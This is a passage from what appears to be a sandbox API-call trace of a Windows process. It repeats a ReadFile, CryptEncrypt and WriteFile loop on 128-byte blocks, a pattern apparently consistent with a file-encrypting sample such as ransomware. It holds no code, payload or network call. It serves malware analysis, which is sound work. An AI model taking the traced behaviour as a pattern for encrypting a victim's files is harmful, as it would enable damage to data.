CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.110] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.110] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.110] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.110] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.110] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.110] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.111] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.111] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.111] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.111] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.111] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.111] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.111] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.111] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.111] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.111] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.111] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.111] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.111] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.111] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.111] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.111] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.111] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.111] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.111] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.111] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.111] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.111] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.111] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.112] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.112] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.112] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.112] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.112] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.112] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.112] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.112] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.112] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.112] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.112] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.112] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.112] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.112] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.112] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.112] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.112] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.112] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.112] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.112] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.112] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.112] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.112] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.113] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.113] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.113] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.113] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.113] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.113] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.113] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.113] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.113] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.113] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.113] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.113] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.113] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.113] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.113] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.113] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.113] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.113] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.113] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.113] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.113] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.114] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.114] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.114] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.114] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.114] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.114] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.114] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.114] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.114] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.114] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.114] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.114] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.114] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.114] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.114] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.114] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.114] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.114] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.114] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.115] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.115] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.115] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.115] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.115] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.115] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.115] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.115] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.115] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.115] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.115] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.115] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.115] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.115] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, 